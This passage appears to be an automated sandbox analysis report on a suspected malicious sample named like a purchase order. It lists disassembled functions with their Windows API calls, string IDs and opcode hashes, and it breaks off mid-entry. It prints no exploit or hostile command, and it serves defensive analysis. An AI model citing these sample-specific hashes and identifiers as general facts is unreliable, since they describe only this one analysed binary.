                                                                  • API ID: _wcslen$Directory$CurrentSystem
                                                                  • String ID: D
                                                                  • API String ID: 1914653954-2746444292
                                                                  • Opcode ID: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                                                  • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                                                  • Opcode Fuzzy Hash: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                                                  • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                                                  Function 0045CD1E Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 215COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _wcsncpy.LIBCMT ref: 0045CE39
                                                                  • __wsplitpath.LIBCMT ref: 0045CE78
                                                                  • _wcscat.LIBCMT ref: 0045CE8B
                                                                  • _wcscat.LIBCMT ref: 0045CE9E
                                                                  • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                                                                    • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                  • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                                                                  • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                                                                  • _wcscpy.LIBCMT ref: 0045CF61
                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                                  • String ID: *.*
                                                                  • API String ID: 1153243558-438819550
                                                                  • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                  • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                                                                  • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                  • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                                                                  Function 0044B98C Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 80COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: __wcsicoll
                                                                  • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                                  • API String ID: 3832890014-4202584635
                                                                  • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                  • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                                                  • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                  • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                                                  Function 0046A07E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 253windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                                  • GetFocus.USER32 ref: 0046A0DD
                                                                  • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                                  • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePost$CtrlFocus
                                                                  • String ID: 0
                                                                  • API String ID: 1534620443-4108050209
                                                                  • Opcode ID: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                                                  • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                                  • Opcode Fuzzy Hash: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                                                  • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                                                  Function 004557E0 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 220COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DestroyWindow.USER32(?), ref: 004558E3
                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CreateDestroy
                                                                  • String ID: ,$tooltips_class32
                                                                  • API String ID: 1109047481-3856767331
                                                                  • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                  • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                                                  • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                  • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                                                  Function 00468B0E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 207windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                                                  • GetMenuItemCount.USER32(?), ref: 00468C45
                                                                  • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                                                  • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                                                  • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                                                  • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                                                  • GetMenuItemCount.USER32 ref: 00468CFD
                                                                  • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                                                  • GetCursorPos.USER32(?), ref: 00468D3F
                                                                  • SetForegroundWindow.USER32(?), ref: 00468D49
                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                                                  • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                                                  • String ID: 0
                                                                  • API String ID: 1441871840-4108050209
                                                                  • Opcode ID: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
                                                                  • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                                                  • Opcode Fuzzy Hash: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
                                                                  • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                                                  Function 00460879 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 136windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                  • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                  • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                  • __swprintf.LIBCMT ref: 00460915
                                                                  • __swprintf.LIBCMT ref: 0046092D
                                                                  • _wprintf.LIBCMT ref: 004609E1
                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                  • API String ID: 3631882475-2268648507
                                                                  • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                  • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                                                  • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                  • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                                                  Function 004716B8 Relevance: 22.7, APIs: 15, Instructions: 179windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                                                  • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                                                  • SendMessageW.USER32 ref: 00471740
                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                                                  • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                                                  • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                                                  • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                                                  • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                                                  • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                                                  • SendMessageW.USER32 ref: 0047184F
                                                                  • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                                                  • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                                                  • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                                                  • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                                                  • String ID:
                                                                  • API String ID: 4116747274-0
                                                                  • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                  • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                                                  • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                  • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                                                  Function 0046163E Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 294windowtimeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                                                                  • _wcslen.LIBCMT ref: 00461683
                                                                  • __swprintf.LIBCMT ref: 00461721
                                                                  • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                                                                  • GetDlgCtrlID.USER32(?), ref: 00461869
                                                                  • GetWindowRect.USER32(?,?), ref: 004618A4
                                                                  • GetParent.USER32(?), ref: 004618C3
                                                                  • ScreenToClient.USER32(00000000), ref: 004618CA
                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                                  • String ID: %s%u
                                                                  • API String ID: 1899580136-679674701
                                                                  • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                  • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                                                                  • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                  • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                                                                  Function 0045FD57 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 227windowsleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                                                  • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                                                  • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: InfoItemMenu$Sleep
                                                                  • String ID: 0
                                                                  • API String ID: 1196289194-4108050209
                                                                  • Opcode ID: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
                                                                  • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                                                  • Opcode Fuzzy Hash: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
                                                                  • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                                                  Function 004313CA Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDC.USER32(00000000), ref: 0043143E
                                                                  • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                                                  • SelectObject.GDI32(00000000,?), ref: 00431466
                                                                  • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                                                  • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                  • String ID: (
                                                                  • API String ID: 3300687185-3887548279
                                                                  • Opcode ID: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                                                  • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                                                  • Opcode Fuzzy Hash: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                                                  • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                                                  Function 0045DA73 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 141COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                    • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                  • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                                                  • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                  • API String ID: 1976180769-4113822522
                                                                  • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                  • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                                                  • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                  • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                                                  Function 00432A10 Relevance: 21.1, APIs: 14, Instructions: 140timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
